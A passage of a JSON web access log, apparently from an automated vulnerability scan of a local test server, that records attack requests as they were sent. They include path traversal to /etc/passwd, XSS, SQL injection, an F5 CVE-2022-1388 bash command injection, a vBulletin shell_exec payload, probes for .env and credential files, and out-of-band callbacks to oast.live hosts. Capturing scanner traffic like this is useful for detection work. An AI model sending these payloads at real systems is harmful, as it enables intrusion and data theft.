"18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Gruntfile.coffee HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/17 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /net/net/net.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configuration.php-dist HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sws/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /start.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KD21iHhLfpVXHiyW7ieS0HTsL.php%5Cx0A HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /contrib/acog/print_form.php?formname=../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WCC2/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login/sls/auth HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"{\x22Type\x22:\x22SubscriptionConfirmation\x22,\x22Message\x22:\x22\x22,\x22SubscribeURL\x22:\x22https://rfi.nessus.org/rfi.txt\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example%E3%80%82com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?m=member&f=login_save HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forum/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-playground-html HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/18 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s3cmd.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dwr/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /synnefoclient/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/start.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ajax/telemetry.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /standard/default.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"{\x0D\x0A \x22ID\x22: \x2229KD1rYXFRY5yavNPS13RLdyg5N\x22,\x0D\x0A \x22Name\x22: \x2229KD1rYXFRY5yavNPS13RLdyg5N\x22,\x0D\x0A \x22Address\x22: \x22127.0.0.1\x22,\x0D\x0A \x22Port\x22: 80,\x0D\x0A \x22check\x22: {\x0D\x0A \x22script\x22: \x22nslookup ca28fg0smpvbd3qg07h08x5et9i4rf6d1.oast.live\x22,\x0D\x0A \x22interval\x22: \x2210s\x22,\x0D\x0A \x22Timeout\x22: \x2286400s\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /v1/agent/service/register HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /redoc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.prod.local HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_inf.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/19 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22123456\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /db/schema.rb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/realms/master/.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"{\x22code\x22:\x22test\x22,\x22state\x22:\x22test\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/login/oauth2/auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ManageFilters.jspa?filter=popular&filterView=popular HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /glpi/ajax/telemetry.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/qards/html2canvasproxy.php?url=https://ca28fg0smpvbd3qg07h08nnpz98k36obr.oast.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"OPTIONS / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"OPTIONS", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"{\x0D\x0A \x22command\x22: \x22run\x22,\x0D\x0A \x22utilCmdArgs\x22: \x22-c 'echo CVE-2022-1388 | rev'\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"localhost","request":"POST /mgmt/tm/util/bash HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:44 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 